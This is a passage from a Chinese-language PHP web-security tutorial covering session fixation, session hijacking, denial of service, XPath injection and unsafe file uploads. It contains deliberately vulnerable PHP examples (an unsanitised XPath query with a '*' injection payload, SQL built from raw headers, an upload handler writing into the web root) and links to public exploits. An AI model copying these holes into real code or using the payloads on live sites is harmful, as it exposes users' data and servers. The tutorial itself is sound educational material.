fixation\uff0c\u9996\u5148\u9700\u8981\u786e\u4fdd\u4f60\u7684\u7535\u8111\u4e0a\u5e76\u4e0d\u5b58\u5728\u4f1a\u8bddID\uff08\u53ef\u4ee5\u5220\u9664cookies\uff09\uff0c\u7136\u540e\u5c06?PHPSESSID=1234\u6dfb\u52a0\u5230URL\u4e2d\u4ee5\u8bbf\u95ee\u8be5\u9875\u9762\u3002\u63a5\u7740\uff0c\u4ee5\u5b8c\u5168\u4e0d\u540c\u7684\u6d4f\u89c8\u5668\uff08\u751a\u81f3\u662f\u5b8c\u5168\u4e0d\u540c\u7684\u8ba1\u7b97\u673a\uff09\u8bbf\u95ee\u6dfb\u52a0\u4e86?PHPSESSID=1234\u7684URL\u5730\u5740\u3002\u6b64\u65f6\u4f60\u5c06\u4f1a\u770b\u5230\u5c4f\u5e55\u4e0a\u5e76\u6ca1\u6709\u8f93\u51fa1\uff0c\u800c\u662f\u7ee7\u7eed\u4f60\u4e4b\u524d\u5f00\u59cb\u7684\u4f1a\u8bdd\u3002<\/p>\n<p>\u4e3a\u4f55\u5b58\u5728\u8fd9\u79cd\u95ee\u9898\u5462\uff1f\u5927\u90e8\u5206\u7684session fixation\u653b\u51fb\u53ea\u662f\u7b80\u5355\u5730\u4f7f\u7528\u4e00\u4e2a\u94fe\u63a5\u6216\u8005\u4e00\u4e2a\u534f\u8bae\uff0c\u4ee5\u5c06\u7528\u6237\u91cd\u5b9a\u5411\u5230\u4e00\u4e2a\u5305\u542b\u4f1a\u8bddID\u7684URL\u5730\u5740\u7684\u8fdc\u7a0b\u7ad9\u70b9\u3002\u7528\u6237\u53ef\u80fd\u5e76\u4e0d\u4f1a\u6ce8\u610f\u5230\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u7ad9\u70b9\u5c06\u663e\u793a\u5b8c\u5168\u76f8\u540c\u7684\u5185\u5bb9\u3002\u7531\u4e8e\u4f1a\u8bddID\u5df2\u88ab\u83b7\u77e5\u4e86\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u5229\u7528\u5b83\u6765\u53d1\u52a8\u4f2a\u9020\u653b\u51fb\uff0c\u6bd4\u5982\u4f1a\u8bdd\u52ab\u6301\uff08session hijacking\uff09\u3002<\/p>\n<p>\u4e00\u6b21\u50cf\u8fd9\u6837\u7b80\u5355\u7684\u653b\u51fb\u662f\u5f88\u5bb9\u6613\u88ab\u963b\u6b62\u7684\u3002\u5982\u679c\u6b63\u5728\u6d3b\u52a8\u7684\u4f1a\u8bdd\u4e0e\u7528\u6237\u62e5\u6709\u7684\u4f1a\u8bddID\u65e0\u5173\uff0c\u90a3\u4e48\u5b83\u53ef\u4ee5\u91cd\u65b0\u751f\u6210\u4f1a\u8bddID\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>session_start();<\/p>\n<p>if (!isset($_SESSION[&#8216;initiated&#8217;]))<\/p>\n<p>{<\/p>\n<p>session_regenerate_id();<\/p>\n<p>$_SESSION[&#8216;initiated&#8217;] = true;<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<p>\u5bf9\u4e8e\u8fd9\u6837\u7b80\u5355\u7684\u9632\u5fa1\uff0c\u653b\u51fb\u8005\u53ea\u9700\u7528\u4e00\u4e2a\u7279\u5b9a\u7684\u4f1a\u8bddID\u521d\u59cb\u5316session\u5373\u53ef\uff0c\u7136\u540e\u4f7f\u7528\u8be5ID\u53d1\u52a8\u653b\u51fb\u3002\u4e3a\u4e86\u963b\u6b62\u8fd9\u7c7b\u653b\u51fb\uff0c\u9996\u5148\u5e94\u5f53\u77e5\u9053\u4f1a\u8bdd\u52ab\u7279\u53ea\u5728\u7528\u6237\u767b\u9646\u540e\u6709\u6548\uff0c\u6216\u8005\u8981\u4e0d\u7136\u5c31\u662f\u83b7\u5f97\u9ad8\u6743\u9650\u540e\u624d\u6709\u7528\u3002\u56e0\u6b64\uff0c\u5982\u679c\u5f53\u6743\u9650\u7ea7\u522b\u6539\u53d8\u65f6\uff08\u4f8b\u5982\u6838\u5b9e\u7528\u6237\u540d\u548c\u5bc6\u7801\u540e\uff09\uff0c\u6211\u4eec\u5c31\u5e94\u8be5\u4fee\u6539\u5373\u5c06\u91cd\u65b0\u751f\u6210\u7684\u4f1a\u8bddID\uff0c\u8fd9\u6837\u6211\u4eec\u624d\u80fd\u771f\u6b63\u5730\u6d88\u9664\u88absession fixation\u653b\u51fb\u7684\u98ce\u9669\u3002<\/p>\n<h6><strong>\u4f1a\u8bdd\u52ab\u6301\uff08<\/strong><strong>Session Hijacking<\/strong><strong>\uff09<\/strong><\/h6>\n<p>\u5728\u6240\u6709\u88ab\u7528\u6765\u8bbf\u95ee\u4ed6\u4eba\u4f1a\u8bdd\u7684\u653b\u51fb\u6280\u672f\u4e2d\uff0c\u4f1a\u8bdd\u52ab\u6301\u65e0\u7591\u662f\u6700\u666e\u904d\u7684\u4e00\u79cd\u4f1a\u8bdd\u653b\u51fb\u6280\u672f\u3002\u6b63\u5982session fixation\u4e00\u6837\uff0c\u5982\u679c\u4f60\u7684\u4f1a\u8bdd\u673a\u5236\u4ec5\u7531session_start()\u7ec4\u6210\uff0c\u90a3\u4e48\u5b83\u5c31\u5b58\u5728\u6f0f\u6d1e\uff0c\u5373\u4f7f\u5229\u7528\u8d77\u6765\u5e76\u4e0d\u7b80\u5355\u3002\u4e0e\u5176\u5173\u6ce8\u5982\u4f55\u963b\u6b62\u4f1a\u8bddID\u88ab\u7a83\u53d6\uff0c\u5012\u4e0d\u5982\u60f3\u60f3\u5982\u4f55\u6210\u529f\u5730\u5b8c\u6210\u4e00\u6b21\u4f1a\u8bddID\u7a83\u53d6\u3002\u7531\u4e8e\u4f1a\u8bdd\u4f2a\u9020\u7684\u6bcf\u4e00\u6b65\u590d\u6742\u5316\u90fd\u4f1a\u63d0\u9ad8\u6211\u4eec\u7684\u5b89\u5168\u6027\uff0c\u56e0\u6b64\u4e3a\u4e86\u5c06\u4f1a\u8bdd\u52ab\u6301\u590d\u6742\u5316\uff0c\u6211\u4eec\u9700\u8981\u68c0\u67e5\u6210\u529f\u5b8c\u6210\u4f1a\u8bdd\u52ab\u6301\u6240\u9700\u8981\u7684\u6bcf\u4e00\u6b65\u9aa4\u3002\u5728\u6bcf\u4e00\u79cd\u65b9\u6848\u4e2d\uff0c\u6211\u4eec\u90fd\u5c06\u5047\u8bbe\u4f1a\u8bddID\u5df2\u88ab\u7a83\u53d6\u3002\u5728\u6700\u4e3a\u7b80\u5355\u7684\u4f1a\u8bdd\u673a\u5236\u4e2d\uff0c\u4e00\u4e2a\u6709\u6548\u7684\u4f1a\u8bddID\u662f\u4f1a\u8bdd\u52ab\u6301\u6210\u529f\u4e0e\u5426\u7684\u5173\u952e\u6240\u5728\u3002\u4e3a\u4e86\u5b8c\u5584\u5b83\uff0c\u6211\u4eec\u9700\u8981\u67e5\u770b\u7528\u4e8e\u5176\u5b83\u8ba4\u8bc1\u7684HTTP\u8bf7\u6c42\u4e2d\u662f\u5426\u8fd8\u6709\u5176\u5b83\u4e1c\u897f\u3002<\/p>\n<h6><strong>\u6ce8\u610f<\/strong><\/h6>\n<p>\u5355\u7eaf\u5730\u4f9d\u9760TCP\/IP\u5c42\u4e0a\u7684\u4e1c\u897f\uff08\u6bd4\u5982IP\u5730\u5740\uff09\u662f\u4e0d\u660e\u667a\u7684\uff0c\u56e0\u4e3a\u4e00\u4e9b\u66f4\u4e3a\u5e95\u5c42\u7684\u534f\u8bae\u65e0\u6cd5\u517c\u5bb9\u53d1\u751f\u5728HTTP\u5c42\u4e0a\u7684\u884c\u4e3a\u3002\u4e00\u4e2a\u7528\u6237\u53ef\u80fd\u7528\u4e0d\u540c\u7684IP\u5730\u5740\u53bb\u5b8c\u6210\u6bcf\u4e00\u6b21\u7684\u8bf7\u6c42\uff0c\u591a\u4e2a\u7528\u6237\u4e5f\u53ef\u80fd\u62e5\u6709\u5171\u540c\u7684IP\u5730\u5740\u3002<\/p>\n<p>\u4e00\u4e2a\u5178\u578b\u7684HTTP requtest:<\/p>\n<p><em>GET \/ HTTP\/1.1<\/em><\/p>\n<p><em>Host: example.org<\/em><\/p>\n<p><em>User-Agent: Mozilla\/5.0 Gecko<\/em><\/p>\n<p><em>Accept: text\/xml, image\/png, image\/jpeg, image\/gif, *\/*<\/em><\/p>\n<p><em>Cookie: PHPSESSID=1234<\/em><\/p>\n<p>\u7531\u4e8eHost header\u662fHTTP\/1.1\u6240\u5fc5\u9700\u7684\uff0c\u56e0\u6b64\u4f9d\u9760\u5176\u5b83\u4fe1\u606f\u662f\u4e0d\u660e\u667a\u7684\u3002\u4f46\u662f\uff0c\u9632\u5fa1\u7684\u575a\u56fa\u7a0b\u5ea6\u786e\u5b9e\u662f\u6211\u4eec\u6240\u9700\u8981\u7684\uff0c\u56e0\u4e3a\u6211\u4eec\u5173\u6ce8\u7684\u662f\u5982\u4f55\u589e\u52a0\u4f1a\u8bdd\u4f2a\u9020\u7684\u96be\u5ea6\uff0c\u4ee5\u9632\u6b62\u5371\u5bb3\u5230\u5408\u6cd5\u7528\u6237\u3002\u5047\u8bbe\u4e4b\u524d\u7684request\u662f\u7531\u4e0b\u9762\u4e0e\u4e4b\u4e0d\u540c\u7684User-Agent\u8bf7\u6c42\u7684\uff1a<\/p>\n<p><em>GET \/ HTTP\/1.1<\/em><\/p>\n<p><em>Host: example.org<\/em><\/p>\n<p><em>User-Agent: Mozilla Compatible (MSIE)<\/em><\/p>\n<p><em>Accept: text\/xml, image\/png, image\/jpeg, image\/gif, *\/*<\/em><\/p>\n<p><em>Cookie: PHPSESSID=1234<\/em><\/p>\n<p>\u867d\u7136\u76f8\u540c\u7684cookie\u662f\u5b58\u5728\u7684\uff0c\u4f46\u662f\u662f\u5426\u53ef\u4ee5\u5047\u8bbe\u5b83\u4eec\u662f\u540c\u4e00\u7528\u6237\u5462\uff1f\u8fd9\u4f3c\u4e4e\u4e0e\u6d4f\u89c8\u5668\u66f4\u6539\u8bf7\u6c42\u5305\u4e2d\u7684User-Agent header\u5f88\u4e0d\u540c\u5427\uff1f\u4e0b\u9762\u6211\u4eec\u4fee\u6539\u4f1a\u8bdd\u673a\u5236\u4ee5\u8fdb\u884c\u5bf9\u6bd4\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>session_start();<\/p>\n<p>if (isset($_SESSION[&#8216;HTTP_USER_AGENT&#8217;]))<\/p>\n<p>{<\/p>\n<p>if ($_SESSION[&#8216;HTTP_USER_AGENT&#8217;] != md5($_SERVER[&#8216;HTTP_USER_AGENT&#8217;]))<\/p>\n<p>{<\/p>\n<p>\/* Prompt for password *\/<\/p>\n<p>exit;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>else<\/p>\n<p>{<\/p>\n<p>$_SESSION[&#8216;HTTP_USER_AGENT&#8217;] = md5($_SERVER[&#8216;HTTP_USER_AGENT&#8217;]);<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<p>\u73b0\u5728\u653b\u51fb\u8005\u4e0d\u4ec5\u9700\u8981\u63d0\u4f9b\u4e00\u4e2a\u6709\u6548\u7684\u4f1a\u8bddID\uff0c\u800c\u4e14\u8fd8\u5fc5\u987b\u63d0\u4f9b\u4e0e\u4f1a\u8bdd\u4e2d\u76f8\u5339\u914d\u7684User-Agent header\u3002\u867d\u7136\u8fd9\u4f7f\u4e8b\u60c5\u8f7b\u5fae\u7684\u590d\u6742\u5316\uff0c\u4f46\u8fd9\u53ef\u4ee5\u4f7f\u5b83\u53d8\u5f97\u66f4\u4e3a\u5b89\u5168\u4e86\u3002<\/p>\n<p>\u6211\u4eec\u662f\u5426\u8fd8\u53ef\u4ee5\u518d\u63d0\u9ad8\u5b83\u7684\u5b89\u5168\u6027\u5462\uff1f\u4eba\u4eec\u8ba4\u4e3a\u83b7\u53d6cookie\u503c\u7684\u901a\u7528\u65b9\u5f0f\u5c31\u662f\u5229\u7528\u6d4f\u89c8\u5668\uff08\u6bd4\u5982IE\uff09\u6f0f\u6d1e\u3002\u8fd9\u4e9b\u653b\u51fb\u65b9\u5f0f\u5305\u62ec\u53d7\u5bb3\u8005\u8bbf\u95ee\u653b\u51fb\u8005\u7684\u6076\u610f\u7ad9\u70b9\uff0c\u56e0\u6b64\u653b\u51fb\u8005\u4e5f\u53ef\u4ee5\u83b7\u53d6\u6b63\u786e\u7684User-Agent header\u3002\u8fd9\u5c31\u8981\u6c42\u6211\u4eec\u5fc5\u987b\u91c7\u53d6\u5176\u5b83\u7684\u4fdd\u62a4\u65b9\u5f0f\u4ee5\u5bf9\u6297\u8fd9\u79cd\u60c5\u51b5\u3002\u5982\u679c\u6211\u4eec\u8981\u6c42\u7528\u6237\u5728\u6bcf\u4e00\u9879\u8bf7\u6c42\u4e2d\u90fd\u5fc5\u987b\u4f20\u8f93User-Agent\u7684MD5\u503c\uff0c\u90a3\u4e48\u653b\u51fb\u8005\u5c06\u65e0\u6cd5\u7be1\u6539\u53d7\u5bb3\u8005\u7684\u8bf7\u6c42\u5305\u4e2d\u6240\u5305\u542b\u7684\u5934\u4fe1\u606f\u4e86\uff0c\u4f46\u8fd9\u4e5f\u5c06\u9700\u8981\u518d\u53d1\u9001\u4e00\u9879\u9644\u52a0\u4fe1\u606f\u4e86\u3002\u5f53\u8fd9\u4e00\u7279\u5b9a\u7684token\u5bb9\u6613\u88ab\u731c\u6d4b\u5230\u65f6\uff0c\u6211\u4eec\u53ef\u4ee5\u5c06\u8fd9\u4e00\u731c\u60f3\u5de5\u4f5c\u590d\u6742\u5316\uff0c\u4ee5\u63d0\u9ad8\u731c\u60f3\u7684\u96be\u5ea6\uff0c\u8fd9\u53ea\u9700\u7b80\u5355\u5730\u6dfb\u52a0\u4e00\u4e2a\u968f\u673a\u751f\u6210\u7684\u989d\u5916\u6570\u636e\u5373\u53ef\u6784\u9020\u51fatoken\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$string = $_SERVER[&#8216;HTTP_USER_AGENT&#8217;];<\/p>\n<p>$string .= &#8216;SHIFLETT&#8217;;<\/p>\n<p>\/* Add any other data that is consistent *\/<\/p>\n<p>$fingerprint = md5($string);<\/p>\n<p>?&gt;<\/p>\n<p>\u8bb0\u4f4f\uff0c\u6211\u4eec\u662f\u5728cookie\u4e2d\u4f20\u8f93\u4f1a\u8bddID\u7684\uff0c\u8fd9\u5c31\u5bfc\u81f4\u4e86\u653b\u51fb\u8005\u5e38\u5e38\u5f97\u53bb\u7834\u574fcookie\uff08\u53ef\u80fd\u6240\u6709\u7684HTTP\u5934\u4e5f\u662f\u5982\u6b64\uff09\u624d\u80fd\u7a83\u53d6\u5230\u4f1a\u8bddID\uff0c\u56e0\u6b64\u6211\u4eec\u5e94\u8be5\u4ee5URL\u53d8\u91cf\u6765\u4f20\u8f93fingerprint\u3002\u8fd9\u4e9b\u90fd\u5fc5\u987b\u5728\u6240\u6709\u7684URL\u4e2d\u4f20\u8f93\uff0c\u5373\u4f7f\u662f\u4f1a\u8bddID\u4e5f\u662f\u5982\u6b64\uff0c\u56e0\u4e3a\u8fd9\u4e9b\u90fd\u662f\u5fc5\u9700\u7684\uff0c\u8fd9\u6837\u4f1a\u8bdd\u624d\u80fd\u81ea\u52a8\u5730\u4fdd\u6301\u4e0b\u53bb\uff08\u8fd8\u5f97\u901a\u8fc7\u6240\u6709\u68c0\u6d4b\uff09\u3002<\/p>\n<p>\u4e3a\u4e86\u786e\u4fdd\u5408\u6cd5\u7528\u6237\u4e0d\u4f1a\u50cf\u72af\u4eba\u4e00\u6837\u88ab\u5bf9\u5f85\uff0c\u8fd9\u5c31\u9700\u8981\u5728\u68c0\u6d4b\u5931\u8d25\u65f6\u8981\u6c42\u8f93\u5165\u5bc6\u7801\u3002\u5982\u679c\u5728\u4f60\u7684\u68c0\u6d4b\u65b9\u6cd5\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u6bd4\u5982\u9519\u8bef\u5730\u5224\u65ad\u4e00\u4e2a\u53d1\u52a8\u4f2a\u9020\u653b\u51fb\u7684\u7528\u6237\uff0c\u90a3\u4e48\u5728\u7ee7\u7eed\u64cd\u4f5c\u524d\u5c31\u5f97\u8981\u6c42\u8f93\u5165\u5bc6\u7801\uff0c\u4ee5\u786e\u4fdd\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\u53d7\u5230\u6700\u5c0f\u7684\u653b\u51fb\u3002\u4e8b\u5b9e\u4e0a\uff0c\u7528\u6237\u53ef\u80fd\u5728\u5bdf\u89c9\u5230\u8fd9\u79cd\u8bf7\u6c42\u65b9\u5f0f\u540e\uff0c\u4f1a\u611f\u6fc0\u4f60\u6dfb\u52a0\u4e86\u8fd9\u79cd\u4fdd\u62a4\u65b9\u5f0f\u3002<\/p>\n<p>\u5176\u5b9e\u8fd8\u6709\u5176\u5b83\u5404\u79cd\u4e0d\u540c\u7684\u65b9\u6cd5\u53ef\u4ee5\u7528\u6765\u63d0\u9ad8\u4f2a\u9020\u4f1a\u8bdd\u7684\u590d\u6742\u7a0b\u5ea6\uff0c\u4ee5\u9632\u6b62\u53d1\u751f\u4f1a\u8bdd\u52ab\u6301\u3002\u540c\u65f6\u5e0c\u671b\u5728\u5bf9session_start()\u7684\u989d\u5916\u5904\u7406\u4e0a\uff0c\u4f60\u53ef\u4ee5\u6709\u81ea\u5df1\u7684\u60f3\u6cd5\u3002\u603b\u4e4b\u53ea\u9700\u8bb0\u4f4f\uff1a\u4e3a\u96be\u574f\u5c0f\u5b50\uff0c\u65b9\u4fbf\u597d\u5c0f\u5b50\u3002<\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b\uff1a<\/strong><\/h6>\n<p>http:\/\/www.milw0rm.com\/exploits\/3508<\/p>\n<p><a href=\"http:\/\/www.milw0rm.com\/exploits\/858\" target=\"_blank\">http:\/\/www.milw0rm.com\/exploits\/858<\/a><\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/871<\/p>\n<h6><strong>10 \u2013 <\/strong><strong>\u62d2\u7edd\u670d\u52a1<\/strong><strong>[Medium, But Hard Assessment]:<\/strong><\/h6>\n<p>WEB\u7a0b\u5e8f\u7279\u522b\u5bb9\u6613\u53d7\u5230\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\u4e00\u4e2aWEB\u7a0b\u5e8f\u5f88\u96be\u8bb2\u6e05\u6076\u610f\u6570\u636e\u4f20\u8f93\u4e0e\u666e\u901a\u6570\u636e\u4f20\u8f93\u4e4b\u95f4\u7684\u4e0d\u540c\uff0c\u8fd9\u91cc\u9762\u6709\u591a\u65b9\u9762\u7684\u56e0\u7d20\uff0c\u4f46\u662f\u5176\u4e2d\u6700\u4e3a\u91cd\u8981\u7684\u4e00\u70b9\u5c31\u662f\uff1a\u7531\u4e8e\u591a\u79cd\u539f\u56e0,IP\u5730\u5740\u4e0d\u80fd\u4f5c\u4e3a\u53ef\u884c\u7684\u9274\u5b9a\u8bc1\u4e66\u3002\u7531\u4e8e\u6ca1\u6709\u4e00\u79cd\u53ef\u9760\u7684\u65b9\u5f0f\u53ef\u4ee5\u5f97\u77e5HTTP request\u6765\u81ea\u54ea\u91cc\uff0c\u8fd9\u5c31\u5bfc\u81f4\u5f88\u96be\u8fc7\u6ee4\u6389\u4e00\u4e9b\u6076\u610f\u7684\u6570\u636e\u4f20\u8f93\u3002\u5bf9\u4e8e\u5206\u5e03\u5f0f\u653b\u51fb\uff0c\u7a0b\u5e8f\u53c8\u8be5\u5982\u4f55\u53bb\u8fa8\u522b\u771f\u5b9e\u653b\u51fb\u4e0e\u591a\u7528\u6237\u540c\u65f6\u91cd\u8f7d\u6570\u636e\uff08\u7f51\u7ad9\u7684\u8fd9\u79cd\u4e34\u65f6\u95ee\u9898\u662f\u53ef\u80fd\u53d1\u751f\u7684\uff09\u6216\u8005\u83b7\u53d6\u201cslash dotted\u201d\u4e4b\u95f4\u7684\u4e0d\u540c\u5462\uff1f<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>\/\/&#8230;.<\/p>\n<p>$user_mode=$_SERVER[&#8216;HTTP_USER_AGENT&#8217;];<\/p>\n<p>$user_ip=$_SERVER[&#8216;SERVER_ADDR&#8217;];<\/p>\n<p>$sql = &#8220;INSERT INTO tbl_name (..) VALUES($user_mode,$user_ip);&#8221;;<\/p>\n<p>\/\/Summon Myssql For each Request and Write into it.<\/p>\n<p>\/\/..<\/p>\n<p>?&gt;<\/p>\n<p>\u5f53\u4e00\u4e9b\u8bbf\u95ee\u8005\u8bf7\u6c42\u67e5\u770b\u76ee\u6807\u7ad9\u70b9\u65f6\uff0c\u4ed6\u4eec\u7684\u4fe1\u606f\uff08\u4f8b\u5982IP\u53ca\u6d4f\u89c8\u5668\u4fe1\u606f\uff09\u5c06\u4f1a\u88ab\u8bb0\u5f55\u5728MYSQL\u6570\u636e\u5e93\u4e2d\u3002\u4e0e\u6b64\u540c\u65f6\uff0c\u5f53\u4e00\u4e9b\u7528\u6237\uff08\u6216\u8005\u4e00\u4e9b\u653b\u51fb\u8005\u53d1\u52a8\u8bf7\u6c42\uff09\u53d1\u9001\u8bf7\u6c42\u540e\uff0cMysql \u670d\u52a1\u5668\u5c06\u5bf9\u5176\u8fdb\u884c\u5904\u7406\u3002<\/p>\n<p>\u5176\u5b83\u5faa\u73af\u51fd\u6570\uff0c\u6bd4\u5982\uff1a[While, for &#8230;]<\/p>\n<p>\u4e00\u65e6\u653b\u51fb\u8005\u53ef\u6467\u6bc1\u4e00\u4e9b\u5fc5\u9700\u7684\u8d44\u6e90\uff0c\u90a3\u4e48\u4ed6\u4eec\u5c31\u53ef\u4ee5\u963b\u6b62\u5408\u6cd5\u7528\u6237\u4f7f\u7528\u7cfb\u7edf\u3002\u4e00\u4e9b\u88ab\u9650\u5236\u7684\u8d44\u6e90\u5305\u62ec<strong>\u5e26\u5bbd\uff0c\u6570\u636e\u5e93\u8fde\u63a5\uff0c\u78c1\u76d8\u5b58\u50a8\uff0c<\/strong><strong>CPU<\/strong><strong>\uff0c\u5185\u5b58\uff0c\u7ebf\u7a0b\uff0c\u6216\u8005\u7a0b\u5e8f\u7279\u5b9a\u8d44\u6e90<\/strong>\u3002<\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b\uff1a<\/strong><\/h6>\n<p>http:\/\/archive.cert.uni-stuttgart.de\/bugtraq\/2006\/01\/msg00397.html<\/p>\n<p>http:\/\/www.derkeiler.com\/Mailing-Lists\/securityfocus\/bugtraq\/2006-03\/msg00092.html<\/p>\n<p>\u5728\u4e0a\u4f8b\u4e2d\uff1a<\/p>\n<p>profile.php\uff1a\u6ce8\u518c\u7528\u6237\uff0c\u6ce8\u518c\u4e2d\u6211\u4eec\u53ef\u4ee5\u4f7f\u5b89\u5168\u4ee3\u7801\u56fe\u7247\u5931\u6548<\/p>\n<p>search.php\uff1a\u901a\u8fc7\u6570\u636e\u5e93\u4e0d\u80fd\u8bb0\u5f55\u5230\u7684\u65b9\u5f0f\u8fdb\u884c\u641c\u7d22\u3002<\/p>\n<h6><strong>11 &#8211; <\/strong><strong>XPath<\/strong><strong>\u6ce8\u5165<\/strong><strong> [XML<\/strong><strong>\u51fd\u6570<\/strong><strong>]:<\/strong><\/h6>\n<p>SQL\u6ce8\u5165\u662f\u6700\u4e3a\u666e\u904d\u7684\u4ee3\u7801\u6ce8\u5165\u653b\u51fb\u65b9\u5f0f\uff0c\u4f46\u6211\u4eec\u8fd9\u91cc\u8981\u8bb2\u8ff0\u7684\u662f\u5176\u5b83\u4e00\u4e9b\u53ef\u5371\u5bb3\u5230\u4f60\u7684\u7a0b\u5e8f\u53ca\u6570\u636e\u7684\u5176\u5b83\u6ce8\u5165\u653b\u51fb\u65b9\u5f0f\uff0c\u4e3b\u8981\u5305\u62ecLDAP\u6ce8\u5165\u548cXPath\u6ce8\u5165\u3002&#8217;XPath injection&#8217;\u4e0eSQL\u6ce8\u5165\u653b\u51fb\u76f8\u4f3c\uff0c\u4f46\u5b83\u7684\u653b\u51fb\u76ee\u6807\u662fXML document\uff0c\u800c\u975eSQL\u6570\u636e\u5e93\u3002&#8217;XPath Injection&#8217;\u662f\u7528\u4e8e\u653b\u51fbWEB\u7ad9\u70b9\u7684\u653b\u51fb\u6280\u672f\uff0c\u7528\u4e8e\u6784\u9020\u6765\u81ea\u7528\u6237\u63d0\u4f9b\u7684XPath\u8bf7\u6c42\u3002<\/p>\n<p>\u4f8b\u5982\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$test = $_GET[&#8216;test&#8217;];<\/p>\n<p>if ($test){<\/p>\n<p>$xml = simplexml_load_file(&#8220;1.xml&#8221;);<\/p>\n<p>$result = $xml-&gt;xpath($test);<\/p>\n<p>print_r($result);<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<p>1.xml :<\/p>\n<p>&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;<\/p>\n<p>&lt;note&gt;<\/p>\n<p>&lt;to&gt;Tove&lt;\/to&gt;<\/p>\n<p>&lt;from&gt;Jani&lt;\/from&gt;<\/p>\n<p>&lt;heading&gt;Reminder&lt;\/heading&gt;<\/p>\n<p>&lt;body&gt;Don&#8217;t forget me this weekend!&lt;\/body&gt;<\/p>\n<p>&lt;\/note&gt;<\/p>\n<p><strong>Good Query :<\/strong><\/p>\n<p>Index.php?test=from<\/p>\n<p><strong>Good Result <\/strong>:<\/p>\n<p>Array ( [0] =&gt; SimpleXMLElement Object ( [0] =&gt; Jani ) )<\/p>\n<p><strong>Bad Query :<\/strong><\/p>\n<p>Index.php?test=*<\/p>\n<p><strong>Good Result For US ! :<\/strong><\/p>\n<p>Array ( [0] =&gt; SimpleXMLElement Object ( [0] =&gt; Tove ) [1] =&gt; SimpleXMLElement Object ( [0] =&gt; Jani<\/p>\n<p>) [2] =&gt; SimpleXMLElement Object ( [0] =&gt; Reminder ) [3] =&gt; SimpleXMLElement Object ( [0] =&gt;Don&#8217;t forget me this weekend! ) )<\/p>\n<p>\u8fd9\u662f\u4e00\u4e2a\u5b58\u5728\u6f0f\u6d1e\u7684PHP\u7a0b\u5e8f\uff01<\/p>\n<h6><strong>\u6ce8\u610f\uff1a<\/strong><\/h6>\n<p>Xpath Injection\u6709\u591a\u79cd\u65b9\u5f0f\uff0c\u6bd4\u5982SQL\/Xpath Inject , Basic Xpath Inject &amp; \u2026<\/p>\n<h6>\u66f4\u591a\u4fe1\u606f\uff1a<\/h6>\n<ul>\n<li>http:\/\/www.modsecurity.org\/archive\/amit\/blind-xpath-injection.pdf<\/li>\n<li>http:\/\/www.ibm.com\/developerworks\/xml\/library\/x-xpathinjection.html<\/li>\n<li>http:\/\/joginipally.blogspot.com\/2007\/10\/code-injection-xpath-injection.html<\/li>\n<li>http:\/\/www.webappsec.org\/projects\/threat\/classes\/xpath_injection.shtml<\/li>\n<\/ul>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b\uff1a<\/strong><\/h6>\n<p><a href=\"http:\/\/www.securityfocus.com\/archive\/1\/466211\" target=\"_blank\">http:\/\/www.securityfocus.com\/archive\/1\/466211<\/a><\/p>\n<h6><strong>12 \u2013 <\/strong><strong>\u5e38\u88ab\u6ee5\u7528<\/strong><strong>: <\/strong><strong>\u6587\u4ef6\u4e0a\u4f20<\/strong><strong> (High):<\/strong><\/h6>\n<p>\u5f53\u5141\u8bb8\u6587\u4ef6\u4e0a\u4f20\u5230\u4f60\u7684\u7cfb\u7edf\u65f6\uff0c\u4f60\u5c31\u5f97\u627f\u62c5\u4e00\u5b9a\u7684\u98ce\u9669\uff0c\u56e0\u4e3a\u6587\u4ef6\u53ef\u80fd\u5e76\u975e\u5b83\u6240\u663e\u793a\u51fa\u6765\u7684\u90a3\u6837\uff08\u4f2a\u88c5\u4e3a\u56fe\u7247\u4ee5\u4e0a\u4f20PHP\u811a\u672c\uff0c\u5e76\u5c06\u5176\u79fb\u52a8\u5230\u4ed6\u4eec\u53ef\u4ee5\u8fd0\u884c\u5b83\u7684\u5730\u65b9\u7b49\u7b49\uff09\u3002\u5982\u679c\u4f60\u7684\u7ad9\u70b9\u4e0d\u9700\u8981\u4e0a\u4f20\u6587\u4ef6\uff0c\u90a3\u4e48\u7981\u6b62\u5b83\u5c06\u53ef\u4ee5\u9632\u6b62\u56e0\u758f\u5ffd\u9020\u6210\u7684\u9519\u8bef\u800c\u88ab\u4e0a\u4f20\u6076\u610f\u6587\u4ef6\u3002<\/p>\n<p><strong>Example 1<\/strong><strong>\uff1a<\/strong>\u4e0b\u5217\u4ee3\u7801\u7528\u4e8e\u5904\u7406\u4e0a\u4f20\u7684\u6587\u4ef6\uff0c\u5b83\u5c06\u6587\u4ef6\u79fb\u52a8\u5230WEB\u6839\u76ee\u5f55\u4e0b\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u4e0a\u4f20\u6076\u610fPHP\u6e90\u6587\u4ef6\u7ed9\u8be5\u7a0b\u5e8f\u4ee5\u53ca\u6765\u81ea\u670d\u52a1\u7aef\u7684\u540e\u7eed\u8bf7\u6c42\uff0c\u8fd9\u5c06\u5bfc\u81f4\u5b83\u4eec\u88abPHP\u89e3\u91ca\u5668\u6267\u884c\uff08\u67e5\u627e<strong>$_FILES<\/strong>\u51fd\u6570\uff09\u3002<\/p>\n<p>&lt;?php<\/p>\n<p>$udir = &#8216;.\/&#8217;; \/\/ Relative path under Web root<\/p>\n<p>$ufile = $udir . basename($_FILES[&#8216;userfile&#8217;][&#8216;name&#8217;]);<\/p>\n<p>if (move_uploaded_file($_FILES[&#8216;userfile&#8217;][&#8216;tmp_name&#8217;], $ufile)) {<\/p>\n<p>echo 